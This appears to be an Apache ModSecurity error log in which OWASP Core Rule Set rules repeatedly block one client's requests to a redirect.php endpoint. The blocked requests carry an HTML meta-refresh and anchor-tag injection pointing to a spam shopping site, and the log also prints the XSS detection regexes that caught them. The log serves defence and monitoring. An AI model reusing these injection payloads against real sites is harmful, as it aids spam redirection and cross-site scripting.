[Tue May 12 06:18:45.828178 2026] [security2:error] [pid 1820198:tid 1820222] [client 27.78.84.116:60175] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqJc1tk6y7yBJLpJpF1AAAAJY"]
[Tue May 12 06:18:45.828614 2026] [security2:error] [pid 1820198:tid 1820222] [client 27.78.84.116:60175] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta ht..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqJc1tk6y7yBJLpJpF1AAAAJY"]
[Tue May 12 06:18:45.828857 2026] [security2:error] [pid 1820198:tid 1820222] [client 27.78.84.116:60175] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqJc1tk6y7yBJLpJpF1AAAAJY"]
[Tue May 12 06:18:45.828990 2026] [security2:error] [pid 1820198:tid 1820222] [client 27.78.84.116:60175] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [ta [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqJc1tk6y7yBJLpJpF1AAAAJY"]
[Tue May 12 06:18:45.829261 2026] [security2:error] [pid 1820198:tid 1820222] [client 27.78.84.116:60175] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqJc1tk6y7yBJLpJpF1AAAAJY"]
[Tue May 12 06:18:45.829706 2026] [security2:error] [pid 1820198:tid 1820222] [client 27.78.84.116:60175] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqJc1tk6y7yBJLpJpF1AAAAJY"]
[Tue May 12 06:18:45.830014 2026] [security2:error] [pid 1820198:tid 1820222] [client 27.78.84.116:60175] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqJc1tk6y7yBJLpJpF1AAAAJY"]
[Tue May 12 06:18:51.028584 2026] [security2:error] [pid 1825287:tid 1825311] [client 27.78.84.116:60548] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqKwgpmE1yW0glLdg9RwAAAMY"]
[Tue May 12 06:18:51.028991 2026] [security2:error] [pid 1825287:tid 1825311] [client 27.78.84.116:60548] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta ht..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqKwgpmE1yW0glLdg9RwAAAMY"]
[Tue May 12 06:18:51.029147 2026] [security2:error] [pid 1825287:tid 1825311] [client 27.78.84.116:60548] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqKwgpmE1yW0glLdg9RwAAAMY"]
[Tue May 12 06:18:51.029250 2026] [security2:error] [pid 1825287:tid 1825311] [client 27.78.84.116:60548] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [ta [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqKwgpmE1yW0glLdg9RwAAAMY"]
[Tue May 12 06:18:51.029419 2026] [security2:error] [pid 1825287:tid 1825311] [client 27.78.84.116:60548] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqKwgpmE1yW0glLdg9RwAAAMY"]
[Tue May 12 06:18:51.029835 2026] [security2:error] [pid 1825287:tid 1825311] [client 27.78.84.116:60548] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqKwgpmE1yW0glLdg9RwAAAMY"]
[Tue May 12 06:18:51.030113 2026] [security2:error] [pid 1825287:tid 1825311] [client 27.78.84.116:60548] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqKwgpmE1yW0glLdg9RwAAAMY"]
[Tue May 12 06:18:56.549455 2026] [security2:error] [pid 1842385:tid 1842402] [client 27.78.84.116:61010] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqMBs7kySIUZ3ORnI2jAAAAQw"]
[Tue May 12 06:18:56.549852 2026] [security2:error] [pid 1842385:tid 1842402] [client 27.78.84.116:61010] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta ht..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqMBs7kySIUZ3ORnI2jAAAAQw"]
[Tue May 12 06:18:56.550025 2026] [security2:error] [pid 1842385:tid 1842402] [client 27.78.84.116:61010] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqMBs7kySIUZ3ORnI2jAAAAQw"]
[Tue May 12 06:18:56.550131 2026] [security2:error] [pid 1842385:tid 1842402] [client 27.78.84.116:61010] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [ta [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqMBs7kySIUZ3ORnI2jAAAAQw"]
[Tue May 12 06:18:56.550298 2026] [security2:error] [pid 1842385:tid 1842402] [client 27.78.84.116:61010] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqMBs7kySIUZ3ORnI2jAAAAQw"]
[Tue May 12 06:18:56.550719 2026] [security2:error] [pid 1842385:tid 1842402] [client 27.78.84.116:61010] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqMBs7kySIUZ3ORnI2jAAAAQw"]
[Tue May 12 06:18:56.551009 2026] [security2:error] [pid 1842385:tid 1842402] [client 27.78.84.116:61010] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqMBs7kySIUZ3ORnI2jAAAAQw"]
[Tue May 12 06:18:57.342447 2026] [authz_core:error] [pid 1820198:tid 1820216] [client 47.128.23.221:63110] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/Requests/Exception/Transport/error_log
[Tue May 12 06:18:59.225184 2026] [security2:error] [pid 1825179:tid 1825207] [client 43.133.91.48:52036] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/feed/"] [unique_id "agKqM9r1yOh9TvizeziugwAAAEk"]
[Tue May 12 06:19:01.461997 2026] [security2:error] [pid 1825287:tid 1825313] [client 43.164.190.124:60074] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "culturesvoile.com"] [uri "/"] [unique_id "agKqNQgpmE1yW0glLdg9SwAAAMg"], referer: http://culturesvoile.com
[Tue May 12 06:19:05.999643 2026] [ssl:error] [pid 1820198:tid 1820203] (EAI 2)Name or service not known: [client 94.103.88.24:55212] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 06:19:05.999675 2026] [ssl:error] [pid 1820198:tid 1820203] AH01941: stapling_renew_response: responder error
[Tue May 12 06:19:06.930838 2026] [security2:error] [pid 1808852:tid 1808857] [client 27.78.84.116:62255] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqOhfeipD4uoG21FpBgQAAAAI"]
